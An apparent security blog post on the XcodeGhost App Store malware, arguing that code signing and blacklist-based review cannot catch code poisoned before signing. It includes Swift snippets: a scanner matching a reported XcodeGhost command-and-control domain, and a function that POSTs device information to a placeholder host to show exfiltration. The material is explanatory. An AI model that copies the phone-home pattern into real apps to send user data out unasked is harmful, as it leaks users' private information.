A good number of apps (4,000 or so, by some counts) on Apple’s App Store were infected with what has come to be known as the XcodeGhost malware. Plenty has already been written about this, but the TL;DR version is this: A version of Xcode was compromised and distributed online to legitimate Chinese app developers. They unknowingly introduced the malware into the Apple App Store via their apps. The malware, once run on a consumer’s iOS device, communicated with the attackers and was capable of, among other things, robbing a user of private information, including login credentials.
That’s pretty nasty stuff, without a doubt, but let’s take a step back and see what can be learned from the incident. Two things come immediately to mind.
My security mantra is “There ain’t a horse that can’t be rode, nor a man that can’t be throwed.” Apple isn’t perfect. None of us is. That’s why responsible companies have robust incident response programs in place to clean up the mess after mistakes are made. But that’s not the point I want to make today.
My hope is that Apple will address architectural weaknesses in the way it vets apps. What comes to my mind is that the digital signatures that Apple relies on for iOS’s security are in essence tamper-evident seals. Now, let’s say that someone wanted to put some bad stuff inside a bottle of aspirin that is protected with a tamper-evident seal. Messing with the packaging is going to make it clear that it has been tampered with. (That’s what makes the packaging tamper-evident, right?) What works better is to do the dirty work upstream in the production process, before the tamper-evident seal is applied. That’s what the attackers did; they tampered with the code before the digital signature was applied.
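To make the analogy concrete, here’s a minimal sketch in Swift, using CryptoKit, with made-up strings standing in for a compiled binary. The point it illustrates: the signature covers whatever bytes the build produced, poisoned or not, so verification downstream tells you nothing about what happened upstream.

```swift
import CryptoKit
import Foundation

// A toy model of code signing: the signature seals whatever bytes the
// build produced. If malware was injected at compile time, it is inside
// the "sealed bottle" before the seal goes on.
let signingKey = Curve25519.Signing.PrivateKey()

// Pretend this is the compiled app binary, already poisoned upstream.
let cleanCode = Data("legitimate app code".utf8)
let injected  = Data("malicious payload".utf8)   // added by the bad Xcode
let binary    = cleanCode + injected

// The developer signs the (already-infected) binary...
let signature = try! signingKey.signature(for: binary)

// ...and verification passes, because nothing changed *after* the seal
// was applied. Tamper-evidence detects tampering after signing, not before.
let sealIntact = signingKey.publicKey.isValidSignature(signature, for: binary)
print(sealIntact)  // true
```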
To succeed, the attackers had to make their modified version of Xcode attractive to developers. That could have been something like better language support, but I don’t really know. What is clear is that enough of them felt that the modified version of Xcode was better than Apple’s in some way, even though Apple’s Xcode is free via its Mac App Store.
Apple may need to find a way to force developers to use its version of Xcode. That won’t be easy, but it’s also not the real problem.
For me, this is the pertinent question: Why on earth didn’t Apple’s screening process detect and stop the XcodeGhost malware in the first place? The answer is fairly obvious, and it’s a problem that has plagued the antivirus industry from its inception.
Apple’s screening process, which doesn’t do any form of source code review, is very good at some things, and not so good at others. It makes sure an app runs as described. It makes sure an app plays by Apple’s rules (for example, that it only uses published APIs). It also looks for things like memory leaks that cause an app to allocate memory without freeing it up again.
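To illustrate the mechanical sort of defect that screening handles well, here’s a classic Swift retain cycle, the textbook way an app allocates memory and never frees it. The class names are invented for the example:

```swift
import Foundation

// Two objects that hold strong references to each other can never be
// deallocated. This is exactly the kind of defect automated tools find.
final class Session {
    var handler: Handler?
    deinit { print("Session freed") }
}

final class Handler {
    // Should be `weak var session: Session?`. The strong reference here
    // creates a retain cycle, so neither deinit ever runs.
    var session: Session?
    deinit { print("Handler freed") }
}

func leak() {
    let session = Session()
    let handler = Handler()
    session.handler = handler
    handler.session = session
    // Both go out of scope here, but neither "freed" line ever prints.
}

leak()
```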
But it’s not very good at screening for deliberate, malicious “features” of apps. Apple could, and I expect does, look for signatures of known bad things that could be in an app. But it doesn’t vet the security of what the app itself chooses to do.
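Signature scanning of that sort is conceptually simple, and that simplicity is its weakness. Here’s a hypothetical Swift sketch; the scanning logic is mine, not Apple’s, and the single pattern shown is one of the widely reported XcodeGhost command-and-control domains:

```swift
import Foundation

// A naive sketch of blacklist-style scanning: search a binary for byte
// patterns of *known* bad code. Its fundamental limit is built in: a
// brand-new payload matches nothing on the list.
let knownBadPatterns: [Data] = [
    Data("init.icloud-analysis.com".utf8)  // reported XcodeGhost C2 domain
]

func looksInfected(binary: Data) -> Bool {
    for pattern in knownBadPatterns {
        if binary.range(of: pattern) != nil {
            return true  // matches a known signature
        }
    }
    return false  // "clean" -- or just not yet on the blacklist
}
```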
In practice, this means that if your app opens and writes to a file, Apple will ensure that you’re using a published API to do that. It will make sure that your app behaves as expected with regard to that file. But if you choose to put client information into that file without encrypting it, that’s really not Apple’s concern — nor should it be, if you ask me. That is business-level security, and it must be applied by the developer.
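Here’s a hypothetical Swift sketch of that business-level choice. Both writes use published APIs and both would sail through review; only one protects the data. The file name and record contents are invented for the example:

```swift
import CryptoKit
import Foundation

// Both paths below use published, sanctioned APIs. Whether the bytes on
// disk are protected is entirely the developer's decision.
let clientRecord = Data("name=Alice;card=4111111111111111".utf8)
let url = URL(fileURLWithPath: NSTemporaryDirectory())
    .appendingPathComponent("clients.dat")

// Option 1: write the record in the clear. App review has no opinion.
try! clientRecord.write(to: url)

// Option 2: business-level security, applied by the developer.
let key = SymmetricKey(size: .bits256)  // in practice, keep this in the Keychain
let sealed = try! AES.GCM.seal(clientRecord, using: key)
try! sealed.combined!.write(to: url)    // overwrites the plaintext version above
```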
So from Apple’s perspective, the XcodeGhost malware was simply a deliberate feature of the infected apps. They’d been signed by their developers, so they contained that tamper-evident seal. The apps behaved as documented.
Should Apple have looked for undocumented behavior? Perhaps. In hindsight, it would have been nice if Apple had observed the apps while they ran and looked for unauthorized, outbound HTTP connections. But how could Apple rightly know which network connections were unauthorized? If the malware was using the Apple API for HTTP connectivity, then it was authorized, right?
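That ambiguity is easy to see in code. In this hypothetical Swift sketch (the hostnames are placeholders, not the real XcodeGhost endpoints), the telemetry ping and the exfiltration call are the very same sanctioned API call:

```swift
import Foundation

// From the screening process's point of view, these two requests are
// indistinguishable: both use Apple's published networking API.
func phoneHome(deviceInfo: Data, to host: String) {
    guard let url = URL(string: "https://\(host)/report") else { return }
    var request = URLRequest(url: url)
    request.httpMethod = "POST"
    request.httpBody = deviceInfo

    URLSession.shared.dataTask(with: request) { _, _, _ in
        // Fire and forget; nothing here marks the traffic as hostile.
    }.resume()
}

let info = Data("model=iPhone;locale=en_US".utf8)
phoneHome(deviceInfo: info, to: "analytics.example.com")  // legitimate telemetry?
phoneHome(deviceInfo: info, to: "collector.example.net")  // or exfiltration?
```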
We can all second-guess what Apple did and didn’t do that allowed so many malware-infected apps to enter the App Store. The important thing, though, is that Apple do some second-guessing of its own. I’ll bet it is already taking a critical look at its app screening process and making some improvements. And so it should. But before we criticize, let’s remember that pithy saying about the horse. App screening is fundamentally a blacklist process, and you’re doomed to be “throwed” from time to time.